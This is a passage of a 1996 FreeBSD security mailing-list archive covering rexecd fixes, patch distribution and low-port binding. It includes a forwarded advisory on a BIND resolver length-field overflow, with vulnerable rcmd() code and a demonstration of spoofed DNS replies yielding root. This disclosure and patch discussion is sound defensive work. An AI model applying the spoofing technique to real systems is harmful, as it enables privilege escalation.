pwd->pw_shell = _PATH_BSHELL; if (f > 2) ------- End of Forwarded Message From owner-freebsd-security Tue Nov 19 10:06:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21110 for security-outgoing; Tue, 19 Nov 1996 10:06:36 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-143.rdcy01.pacbell.net [206.170.5.143]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21105; Tue, 19 Nov 1996 10:06:30 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id KAA18076; Tue, 19 Nov 1996 10:05:49 -0800 (PST) Message-Id: <199611191805.KAA18076@precipice.shockwave.com> To: cschuber@uumail.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 1996 07:53:27 PST." <199611191553.HAA00979@cwsys.cwent.com> Date: Tue, 19 Nov 1996 10:05:49 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Thanks for the heads up, I've just made similar patches to -current and requested their incorporation into both release branches. This fix will not make 2.1.6, but will make the 2.1.6 "service pack update" (hah) and 2.2. Since FreeBSD ships with rexecd disabled, I don't consider this a critical issue, however we will cut an SA in the next week or so (if I ever have a free moment again). Paul From owner-freebsd-security Tue Nov 19 10:16:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21660 for security-outgoing; Tue, 19 Nov 1996 10:16:39 -0800 (PST) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21653; Tue, 19 Nov 1996 10:16:36 -0800 (PST) Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.3/8.6.10) with SMTP id KAA06551; Tue, 19 Nov 1996 10:16:19 -0800 (PST) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199611191816.KAA06551@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@orca.gov.bc.ca X-Mailer: DXmail To: Paul Traina cc: cschuber@orca.gov.bc.ca, security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 96 10:05:49 PST." <199611191805.KAA18076@precipice.shockwave.com> Date: Tue, 19 Nov 96 10:16:18 -0800 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is the first I've heard of a "service pack update." What is a "service pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT (Program Update Tape)? How does one get a "service pack update?" Regards, Phone: (250)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." > Thanks for the heads up, I've just made similar patches to -current and > requested their incorporation into both release branches. This fix will > not make 2.1.6, but will make the 2.1.6 "service pack update" (hah) and > 2.2. > > Since FreeBSD ships with rexecd disabled, I don't consider this a critical > issue, however we will cut an SA in the next week or so (if I ever have a > free moment again). > > Paul From owner-freebsd-security Tue Nov 19 10:33:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA22797 for security-outgoing; Tue, 19 Nov 1996 10:33:45 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-143.rdcy01.pacbell.net [206.170.5.143]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA22772; Tue, 19 Nov 1996 10:33:31 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id KAA18369; Tue, 19 Nov 1996 10:32:45 -0800 (PST) Message-Id: <199611191832.KAA18369@precipice.shockwave.com> To: cschuber@orca.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 1996 10:16:18 PST." <199611191816.KAA06551@passer.osg.gov.bc.ca> Date: Tue, 19 Nov 1996 10:32:45 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk From: Cy Schubert - ITSD Open Systems Group Subject: Re: Futile rexecd holes This is the first I've heard of a "service pack update." What is a "service pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT (Program Update Tape)? How does one get a "service pack update?" Microsoft released a bunch of critical bugfixes for W95 and called it "Service Pack Update 1". It's a bad joke for what we're planning to call 2.1.6a (sigh). From owner-freebsd-security Tue Nov 19 13:35:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA07913 for security-outgoing; Tue, 19 Nov 1996 13:35:37 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA07870; Tue, 19 Nov 1996 13:35:25 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id QAA02013; Tue, 19 Nov 1996 16:34:26 -0500 Date: Tue, 19 Nov 1996 15:34:24 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Serious BIND resolver problem. (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >From your friendly neighborhood paranoia victim comes yet another loaded question... I got this little advisory (thankfully without an exploit) today, and it's got me all worried. It's a problem in the whole gethostbyname call that allows (supposedly) local and remote users to gain root access using a variety of programs that rely on the gethostbyname call. So I downloaded BIND-4.9.3-REL which fixes all of this; and then I read the README in the BSD directory, got thoroughly confused, and posted my root password to #hack on irc. (kidding). Now this does not appear to be a simple feat (hence my posting to -questions and -security; security people can look at it and laugh, and questions can tell me all about "diff-ing my source tree" and "manually updating includes (which you may or may not have to do)." So my question is this; could anyone who's already updated this give me some advice or some pointers to this procedure?? The site carrying 4.9.3-REL is over at: ftp.vix.com/pub/bind/release Thanks All, Charles "I may dance like a computer professional, but I rock like Molly Hatchet." ---------- Forwarded message ---------- Date: Mon, 18 Nov 1996 22:54:03 -0700 From: Oliver Friedrichs To: Multiple recipients of list BUGTRAQ Subject: Serious BIND resolver problem. ###### ## ## ###### ## ### ## ## ###### ## # ## ## ## ## ### ## ###### . ## ## . ###### . Secure Networks Inc. Security Advisory November 18, 1996 Vulnerability in Unchecked DNS Data. In research for our upcoming network auditing tool, we have uncovered a serious problem present in implementations of BIND which trust invalid data sent to them. This vulnerability specifically applies to hostname to address resolution and can result in local and remote users obtaining root privileges. It is recommended that security conscious users upgrade to the latest version of the BIND resolver immediately. Information on obtaining the latest official release is provided at the end of this message. Technical Details ~~~~~~~~~~~~~~~~~ When a standard hostname lookup is performed on internet connected systems, the resulting address should be 4 bytes (Forgetting about IPv6 for now). Assuming that the address will always be 4 bytes, many privileged and unprivileged programs (including network daemons) trust the address length field which is returned from gethostbyname() in the hostent structure. By trusting the length field returned by DNS to be 4 bytes, it then copies the address into a 4 byte address variable. The vulnerability exists due to the fact that we can specify the size of IP address data within the DNS packet ourselves. By specifying a size larger than 4 bytes, an overflow occurs, as the program attempts to copy the data into the 4 byte structure it has allocated to store the address. One example of this vulnerability occurs in rcmd.c, the standard BSD library routine which is used by rsh and rlogin to remotely connect to systems. Note that the code itself is not faulty, however the resolver implementation is. Example code follows: hp = gethostbyname(*ahost); if (hp == NULL) { herror(*ahost); return (-1); } *ahost = hp->h_name; . . . bzero(&sin, sizeof sin); sin.sin_len = sizeof(struct sockaddr_in); sin.sin_family = hp->h_addrtype; sin.sin_port = rport; bcopy(hp->h_addr_list[0], &sin.sin_addr, hp->h_length); In this example, we copy hp->h_length ammount of data into the address variable of a sockaddr_in structure, which is 4 bytes. The hp->h_length variable is taken directly from the DNS reply packet. If we now look at how rcmd() declares it's variables, and after looking through rlogin with a debugger, we can determine that this is a dangerous situation. int rcmd(ahost, rport, locuser, remuser, cmd, fd2p) char **ahost; u_short rport; const char *locuser, *remuser, *cmd; int *fd2p; { struct hostent *hp; struct sockaddr_in sin, from; fd_set reads; On further testing, and implementation of exploitation code, we can verify that this is indeed possible via the rlogin service. In order to exploit the problem, we first start a program to send a fake DNS replies. [root@ariel] [Dec 31 1969 11:59:59pm] [~]% ./dnsfake oakmont.secnet.com(4732)->idoru.secnet.com(53) : lookup: random-domain.com (1:1) sent packet fake reply: 270 bytes idoru.secnet.com(53)->oakmont.secnet.com(4732) : reply: random-domain.com (1:1) We then cause rcmd() within rlogin to do a host lookup and response with our false data. [oliver@oakmont] [Dec 31 1969 11:58:59pm] [~]% whoami oliver [oliver@oakmont] [Jan 01 1970 00:00:01am] [~]% rlogin random-domain.com random-domain.com: Connection refused # whoami root # Impact ~~~~~~ By checking common BSD sources, we can see that over 20 local programs are vulnerable to this attack, and possibly 2 remote daemons. The possibility of exploiting local programs may seem insignificant, however if one considers an attacker somewhere on the internet intercepting DNS lookups, and inserting their own replies, it isn't. There is a real threat of passive attacks present here, whereby any user on a network running any of these programs can be a victim. Take for instance traceroute, or ping both of which fall prey to this problem. Aside from stock UN*X programs which ship with most vendor operating systems, there appears to be problems related to h_length in external software packages. Due to the flaw, FWTK (Firewall Toolkit) a freely available firewall kit appears vulnerable. The generic routine, conn_server(), which is utilizied by the proxy servers, appears to trust the data as well. Vulnerable Systems ~~~~~~~~~~~~~~~~~~ At this point we would assume that most vendor systems who have incorporated BIND directly into their operating system are vulnerable. Solaris is not vulnerable according to Casper Dik Fix Information ~~~~~~~~~~~~~~~ The maintainers of BIND, and CERT were notified of this problem several months previous to this posting. We recommend upgrading to the latest release of BIND which solves this problem due to the incorporation of IPv6 address support. The latest official release of BIND is availible at: ftp.vix.com in the directory /pub/bind/release/4.9.5 We wish to acknowledge and thank Theo Deraadt, the maintainer of the OpenBSD operating system for his help in finding and analyzing this problem. More information on OpenBSD can be found at http://www.openbsd.org. - Oliver Friedrichs -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAzJATn0AAAEEAJeGbZyoCw14fCoAMeBRKiZ3L6JMbd9f4BtwdtYTwD42/Uz1 A/4UiRJzRLGhARpt1J06NVQEKXQDbejxGIGzAGTcyqUCKH6yNAncqoep3+PKIQJd Kd23buvbk7yUgyVlqQHDDsW0zMKdlSO7rYByT6zsW0Rv5JmHJh/bLKAOe7p9AAUR tCVPbGl2ZXIgRnJpZWRyaWNocyA8b2xpdmVyQHNlY25ldC5jb20+iQCVAwUQMkBO fR/bLKAOe7p9AQEBOAQAkTXiBzf4a31cYYDFmiLWgXq0amQ2lsamdrQohIMEDXe8 45SoGwBzXHVh+gnXCQF2zLxaucKLG3SXPIg+nJWhFczX2Fo97HqdtFmx0Y5IyMgU qRgK/j8KyJRdVliM1IkX8rf3Bn+ha3xn0yrWlTZMF9nL7iVPBsmgyMOuXwZ7ZB8= =xq4f -----END PGP PUBLIC KEY BLOCK----- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Oliver Friedrichs - (403) 262-9211 - Secure Networks Inc. Suite 440, 703-6th Avenue S.W. Calgary, AB, Canada, T2P 0T9 From owner-freebsd-security Tue Nov 19 14:50:42 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA12447 for security-outgoing; Tue, 19 Nov 1996 14:50:42 -0800 (PST) Received: from dark.sinister.com (security@sinister.tiac.net [206.119.18.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA12426; Tue, 19 Nov 1996 14:50:34 -0800 (PST) Received: from localhost (security@localhost) by dark.sinister.com (8.8.2/8.6.9) with SMTP id RAA15677; Tue, 19 Nov 1996 17:48:16 -0500 Date: Tue, 19 Nov 1996 17:48:11 -0500 (EST) From: Security Officer To: "S(pork)" cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 19 Nov 1996, S(pork) wrote: > >From your friendly neighborhood paranoia victim comes yet another loaded > question... > > I got this little advisory (thankfully without an exploit) today, and it's > got me all worried. It's a problem in the whole gethostbyname call that > allows (supposedly) local and remote users to gain root access using a > variety of programs that rely on the gethostbyname call. So I downloaded > BIND-4.9.3-REL which fixes all of this; and then I read the README in the I think you want 4.9.5 > > ---------- Forwarded message ---------- > Date: Mon, 18 Nov 1996 22:54:03 -0700 > From: Oliver Friedrichs > To: Multiple recipients of list BUGTRAQ > Subject: Serious BIND resolver problem. > > > We recommend upgrading to the latest release of BIND which solves this > problem due to the incorporation of IPv6 address support. > > The latest official release of BIND is availible at: > > ftp.vix.com in the directory /pub/bind/release/4.9.5 > > --Dr. Who System Administrator Sinister Networks From owner-freebsd-security Tue Nov 19 14:55:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA12744 for security-outgoing; Tue, 19 Nov 1996 14:55:28 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA12722; Tue, 19 Nov 1996 14:55:18 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id RAA02126; Tue, 19 Nov 1996 17:54:06 -0500 Date: Tue, 19 Nov 1996 16:54:05 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: Security Officer cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Whoops, yeah, 4.9.5; question still stands... sorry... Charles On Tue, 19 Nov 1996, Security Officer wrote: > > > On Tue, 19 Nov 1996, S(pork) wrote: > > > >From your friendly neighborhood paranoia victim comes yet another loaded > > question... > > > > I got this little advisory (thankfully without an exploit) today, and it's > > got me all worried. It's a problem in the whole gethostbyname call that > > allows (supposedly) local and remote users to gain root access using a > > variety of programs that rely on the gethostbyname call. So I downloaded > > BIND-4.9.3-REL which fixes all of this; and then I read the README in the > > I think you want 4.9.5 > > > > > > ---------- Forwarded message ---------- > > Date: Mon, 18 Nov 1996 22:54:03 -0700 > > From: Oliver Friedrichs > > To: Multiple recipients of list BUGTRAQ > > Subject: Serious BIND resolver problem. > > > > > > > > We recommend upgrading to the latest release of BIND which solves this > > problem due to the incorporation of IPv6 address support. > > > > The latest official release of BIND is availible at: > > > > ftp.vix.com in the directory /pub/bind/release/4.9.5 > > > > > > > --Dr. Who > > System Administrator > Sinister Networks > > > From owner-freebsd-security Tue Nov 19 15:30:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA15144 for security-outgoing; Tue, 19 Nov 1996 15:30:32 -0800 (PST) Received: from mail.vividnet.com (mail.vividnet.com [206.149.144.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA15137; Tue, 19 Nov 1996 15:30:20 -0800 (PST) Received: from taurus.vividnet.com (taurus.vividnet.com [206.149.144.6]) by mail.vividnet.com (8.8.3/8.8.3) with ESMTP id OAA21843; Tue, 19 Nov 1996 14:55:21 -0800 (PST) Received: from localhost (postmaster@taurus.vividnet.com) by taurus.vividnet.com (8.7.6/8.6.9) with SMTP id PAA03576; Tue, 19 Nov 1996 15:24:44 -0800 (PST) X-Authentication-Warning: taurus.vividnet.com: brian owned process doing -bs Date: Tue, 19 Nov 1996 15:24:44 -0800 (PST) From: Brian Wang To: "S(pork)" cc: freebsd-security@FreeBSD.org, freebsd-questions@FreeBSD.org Subject: Re: Serious BIND resolver problem. (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 19 Nov 1996, S(pork) wrote: > >From your friendly neighborhood paranoia victim comes yet another loaded > question... > > I got this little advisory (thankfully without an exploit) today, and it's > got me all worried. It's a problem in the whole gethostbyname call that > allows (supposedly) local and remote users to gain root access using a > variety of programs that rely on the gethostbyname call. So I downloaded > BIND-4.9.3-REL which fixes all of this; and then I read the README in the > BSD directory, got thoroughly confused, and posted my root password to > #hack on irc. (kidding). Now this does not appear to be a simple feat > (hence my posting to -questions and -security; security people can look at > it and laugh, and questions can tell me all about "diff-ing my source > tree" and "manually updating includes (which you may or may not have to > do)." So my question is this; could anyone who's already updated this > give me some advice or some pointers to this procedure?? The site > carrying 4.9.3-REL is over at: ftp.vix.com/pub/bind/release > > Thanks All, > > Charles Charles, I think 4.9.5-REL over at ftp.vix.com/pub/bind/release/4.9.5 is what you are looking for, and as suggested by the advisory. I just updated our 2 name servers this morning, and all I did is make, and then make install. Sincerely, Brian From owner-freebsd-security Tue Nov 19 16:33:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA18817 for security-outgoing; Tue, 19 Nov 1996 16:33:11 -0800 (PST) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA18812; Tue, 19 Nov 1996 16:33:07 -0800 (PST) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.2/8.7.3) id LAA03928; Wed, 20 Nov 1996 11:02:23 +1030 (CST) From: Michael Smith Message-Id: <199611200032.LAA03928@genesis.atrad.adelaide.edu.au> Subject: Re: Futile rexecd holes In-Reply-To: <199611191816.KAA06551@passer.osg.gov.bc.ca> from Cy Schubert - ITSD Open Systems Group at "Nov 19, 96 10:16:18 am" To: cschuber@orca.gov.bc.ca Date: Wed, 20 Nov 1996 11:02:22 +1030 (CST) Cc: pst@shockwave.com, cschuber@orca.gov.bc.ca, security-officer@FreeBSD.org, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Cy Schubert - ITSD Open Systems Group stands accused of saying: > This is the first I've heard of a "service pack update." What is a "service > pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT > (Program Update Tape)? It sounds to me like a concept-in-progress. > How does one get a "service pack update?" I would say that if someone were to produce binary update kits for things like this, that people would be very happy. Basically you do something like this : - Install your reference system (eg. 2.1.6). - Make an MD5 listing of all the files in the system, save this as the "2.1.6 MD5 fingerprint". - Patch your sources, make world, so now you have 2.1.6p1. Make another MD5 listing of all the files in the system, save this as the "2.1.6p1 fingerprint". Make a note of the checkout time of the tree you did your build from so that you can reproduce it later. - Compare the two listings, produce a list of files that have changed between the two patchlevels. Seperate the files based on their dist categories (bin, manpages, etc). - Make tarballs of the changed files, advertise them as the "level 1 patchkit". - Repeat the process when more changes appear. Don't be afraid to require that all kits be applied in order. -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Tue Nov 19 16:38:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA19101 for security-outgoing; Tue, 19 Nov 1996 16:38:55 -0800 (PST) Received: from red.jnx.com (red.jnx.com [208.197.169.254]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA19096 for ; Tue, 19 Nov 1996 16:38:50 -0800 (PST) Received: from base.jnx.com (base.jnx.com [208.197.169.238]) by red.jnx.com (8.8.3/8.8.3) with ESMTP id QAA18266 for ; Tue, 19 Nov 1996 16:38:20 -0800 (PST) Received: (from pst@localhost) by base.jnx.com (8.7.6/8.7.3) id QAA01299; Tue, 19 Nov 1996 16:38:10 -0800 (PST) From: FreeBSD Security Officer cc: freebsd-security@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) References: Date: 19 Nov 1996 16:38:09 -0800 In-Reply-To: security@sinister.com's message of 19 Nov 96 22:48:11 GMT Message-ID: <7ypw19iosu.fsf@base.jnx.com> Lines: 9 X-Mailer: Gnus v5.2.25/XEmacs 19.14 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk The SNI advisory is for a problem that had been corrected quite some time ago. This is a "late" advisory causing lots of folks confusion. The problem is in the resolver libraries (in libc). Upgrading named to 4.9.5 will not fix this problem. This problem was quietly fixed in 2.1 -stable and -current releases by explicit request of the author several months ago. Paul From owner-freebsd-security Tue Nov 19 17:15:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA21203 for security-outgoing; Tue, 19 Nov 1996 17:15:24 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA21172; Tue, 19 Nov 1996 17:15:15 -0800 (PST) Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id RAA19552; Tue, 19 Nov 1996 17:13:56 -0800 (PST) Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id MAA12392; Wed, 20 Nov 1996 12:13:33 +1100 From: Julian Assange Message-Id: <199611200113.MAA12392@suburbia.net> Subject: Re: Serious BIND resolver problem. (fwd) To: brian@mail.vividnet.com (Brian Wang) Date: Wed, 20 Nov 1996 12:13:33 +1100 (EST) Cc: freebsd-hackers@freebsd.org, freebsd-security@freebsd.org In-Reply-To: from "Brian Wang" at Nov 19, 96 03:24:44 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > > > On Tue, 19 Nov 1996, S(pork) wrote: > > > >From your friendly neighborhood paranoia victim comes yet another loaded > > question... > > > > I got this little advisory (thankfully without an exploit) today, and it's > > got me all worried. It's a problem in the whole gethostbyname call that > > allows (supposedly) local and remote users to gain root access using a > > variety of programs that rely on the gethostbyname call. So I downloaded > > BIND-4.9.3-REL which fixes all of this; and then I read the README in the > > BSD directory, got thoroughly confused, and posted my root password to > > #hack on irc. (kidding). Now this does not appear to be a simple feat > > (hence my posting to -questions and -security; security people can look at > > it and laugh, and questions can tell me all about "diff-ing my source > > tree" and "manually updating includes (which you may or may not have to > > do)." So my question is this; could anyone who's already updated this > > give me some advice or some pointers to this procedure?? The site > > carrying 4.9.3-REL is over at: ftp.vix.com/pub/bind/release > > > > Thanks All, > > > > Charles > > Charles, > > I think 4.9.5-REL over at ftp.vix.com/pub/bind/release/4.9.5 is > what you are looking for, and as suggested by the advisory. I just > updated our 2 name servers this morning, and all I did is make, and then > make install. > > Sincerely, > > Brian > it isn't the name servers you need to upgrade, it is the resolver libraries. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D | +---------------------+--------------------+----------------------------------+ From owner-freebsd-security Tue Nov 19 17:32:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA22466 for security-outgoing; Tue, 19 Nov 1996 17:32:05 -0800 (PST) Received: from ocean.campus.luth.se (ocean.campus.luth.se [130.240.194.116]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA22450 for ; Tue, 19 Nov 1996 17:32:02 -0800 (PST) Received: (from karpen@localhost) by ocean.campus.luth.se (8.7.5/8.7.3) id CAA23822; Wed, 20 Nov 1996 02:38:52 +0100 (MET) From: Mikael Karpberg Message-Id: <199611200138.CAA23822@ocean.campus.luth.se> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: marcs@znep.com (Marc Slemko) Date: Wed, 20 Nov 1996 02:38:52 +0100 (MET) Cc: phk@critter.tfs.com, freebsd-security@FreeBSD.ORG In-Reply-To: from Marc Slemko at "Nov 18, 96 10:21:49 pm" X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk According to Marc Slemko: > All arguments about just how much of a MTA needs to bet setuid and why it > can/can't be that way in real/fake life, do people think what phk suggests > would be a useful thing, either as a seperate patch or in the base kernel? > > It is trivial to implement; took 10 minutes to hack together a limited > version (ie. uses names like net.inet.tcp.uidforport_25 because I didn't > feel like creating a new level just for my hack and all the ports aren't > implemented). If it's trivial... Could someone take this suggestion seriously and simply implement it? Since nothing will happen unless you use it, it's safe as a default compability, and it gives additional freedom for more secure setup. > The biggest problem I see to implementing such a thing is that I can't see > a pretty way to make it fit into the sysctl mold without having 1024 > lines, one for each port < 1024. Anyone have any ideas on how to do that > nicely or if 1024 lines is ok? I think it's acceptable wtih 1024 lines. Really... If all ports default to root only, how many lines would you have? Do you use all ports < 1024? And of many of those things run under inetd , which has to run as root anyway. You will probably never use more then a few lines. > On Mon, 18 Nov 1996, Poul-Henning Kamp wrote: [...] > > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` [...] Just my $0.02 /Mikael From owner-freebsd-security Tue Nov 19 18:09:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA24187 for security-outgoing; Tue, 19 Nov 1996 18:09:13 -0800 (PST) Received: from sag.space.lockheed.com (sag.space.lockheed.com [192.68.162.134]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA24180 for ; Tue, 19 Nov 1996 18:09:00 -0800 (PST) Received: from localhost by sag.space.lockheed.com; (5.65v3.2/1.1.8.2/21Nov95-0423PM) id AA24914; Tue, 19 Nov 1996 18:08:59 -0800 Date: Tue, 19 Nov 1996 18:08:59 -0800 (PST) From: "Brian N. Handy" To: freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-Reply-To: <199611200032.LAA03928@genesis.atrad.adelaide.edu.au> Message-Id: X-Files: The truth is out there Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 20 Nov 1996, Michael Smith wrote: >Cy Schubert - ITSD Open Systems Group stands accused of saying: >> This is the first I've heard of a "service pack update." What is a "service >> pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT >> (Program Update Tape)? > >It sounds to me like a concept-in-progress. > >> How does one get a "service pack update?" > >I would say that if someone were to produce binary update kits for things >like this, that people would be very happy. Basically you do something like >this : Wow...this is scary. Someone makes a crack about Micro$oft's bug fix system, and suddenly we're implementing it? :-) Scared, very scared of the impending FreeBSD Service Pack I, Brian From owner-freebsd-security Tue Nov 19 18:14:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA24551 for security-outgoing; Tue, 19 Nov 1996 18:14:48 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA24536 for ; Tue, 19 Nov 1996 18:14:39 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id TAA04491; Tue, 19 Nov 1996 19:14:24 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id TAA07199; Tue, 19 Nov 1996 19:11:50 -0700 (MST) Date: Tue, 19 Nov 1996 19:11:50 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Mikael Karpberg cc: phk@critter.tfs.com, freebsd-security@FreeBSD.ORG Subject: binding to ports < 1024 (was: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).) In-Reply-To: <199611200138.CAA23822@ocean.campus.luth.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 20 Nov 1996, Mikael Karpberg wrote: > According to Marc Slemko: > > > The biggest problem I see to implementing such a thing is that I can't see > > a pretty way to make it fit into the sysctl mold without having 1024 > > lines, one for each port < 1024. Anyone have any ideas on how to do that > > nicely or if 1024 lines is ok? > 